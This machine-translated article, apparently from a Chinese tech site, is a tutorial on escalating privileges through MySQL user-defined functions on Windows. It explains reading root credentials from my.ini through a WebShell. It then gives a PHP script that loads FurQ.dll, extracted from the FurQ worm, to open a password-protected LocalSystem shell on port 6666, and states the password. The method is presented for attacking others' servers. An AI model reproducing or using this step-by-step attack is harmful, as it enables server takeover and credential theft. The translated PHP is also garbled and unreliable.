Shulou(Shulou.com)05/31 Report--

This article introduces the knowledge of "how to enhance the authority of MySQL". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

In fact, we could have thought of it a long time ago. When we attack the MSSQLOracle database, we get the most privileged account in the database, and often execute special extension procedures or functions to attack. For example, MSSQL has Xp_cmdshell,Oracle that can be used to create a special function through Msvcrt.dll. However, we never thought that MySQL, as one of the popular database software, can also create functions. From this point of view, this vulnerability in MySQL should not be called a vulnerability but just a technology.

After a lot of nonsense, let's learn how to create a function in MySQL. This is much more important than how to use it. As long as you understand the principle, you can use it more flexibly and integrate with other ideas.

The statement to create a function in MySQL is:

Create Function FunctionName Returns [String | Integer | Real] Soname C:function.dll

Where FunctionName refers to the name of the function, C:Function.DLL refers to the DLL called by the function, and the function name is the name of the function in DLL. But what we need to note here is that if we need MySQL to attach a parameter to the function, then we have to comply with the programming rules in the form of UDF. For more information, please see section 14 of the MySQL manual: "adding new functions to MySQL." Where STRING,INTEGET,REAL is the form of the value returned after the function is executed. Of course, we do not have to follow the UDF form of writing, in fact, if our function uses a code we want to execute, instead of using parameters, we can still achieve the effect of attack, such as System ("command.com") and so on. The FurQ worm that is now attacked with this vulnerability on the Internet is an example of not using the UDF format. Note, however, that the statement that creates the function must require the MySQL account we use to have write access to the mysql database, otherwise it will not work properly.

Okay。 After understanding the principle, let's take a look at how to use MySQL to elevate privileges.

Here we have obtained a server's WebShell through a variety of vulnerabilities. What I demonstrate here is angel's spy, because PHP has a function to connect to MySQL by default, while ASP needs to use additional components to connect, which itself does not have the conditions.

Generally speaking, under the Win system, many software will create a file called my.ini in the system directory, which contains very sensitive MySQL information. If the host we conquer does not have very good permissions, we have browsing rights to the% windir% directory, so it is very easy to read the information in it. And many administrators usually write root accounts and passwords into this My.ini, so once we read the root user's password, we can manipulate the entire MySQL or the server. Figure 1.

After getting the Root password of MySQL, we need to upload our DLL file, which I use here is FurQ.dll extracted from FurQ worm. Execute the Shell function in this FurQ.DLL, and the system will open a CMDShell with a password on port 6666. Of course, the password we already know is just a few characters of "FurQ". However, we have not yet implemented the conditions. You need to create this function into MySQL through MySQL.

Now, let's create a new PHP file with PHPSPY.

Enter the following

$link=_connect (127.0.0.1)

If (! $link) {

Die (Could NOt Connect The databases:. Mysql_error ()

}

Echo "Good Boy.Connected!

"

/ / the rootoot here is the user and password read from my.ini.

@ mysql_select_db (mysql) or die (use database mysql failed!)

Echo "Yes You Did!

"

/ / choose to use MySQL database tables here. Of course, you can choose something else, such as test.

$query= "Create Function Shell RETURNS INTEGER SONAME d:\ wwwroot\ FurQ.dll;"

@ $result = mysql_query ($query, $link) or die ("Create Function Failed!")

Echo "Goddess...Successed!

"

/ / these two sentences are the key, execute the create function statement of MySQL. Create the Shell function in d:wwwrootfurq.dll into MySQL. Enables MySQL to execute the Shell function.

$query= "Select Shell ();"

@ $result = mysql_query ($query, $link) or die ("Execute failed")

Echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ

"

/ / this step is to execute the Shell function and open port 6666 of the server.

? >

Execute again and all return normally. Figure 2. So now, we can use nc to connect to port 6666 of the server and enter this password: FurQ. And then go back to CMDSHELL.. Of course, because it inherits the permission of MySQL, and MySQL under Win system is installed with service by default, that is to say, the Shell we get is LocalSystem permission, so we can do whatever we want, but don't do anything bad. He he。

This is the end of the content of "how to enhance permissions for MySQL". Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.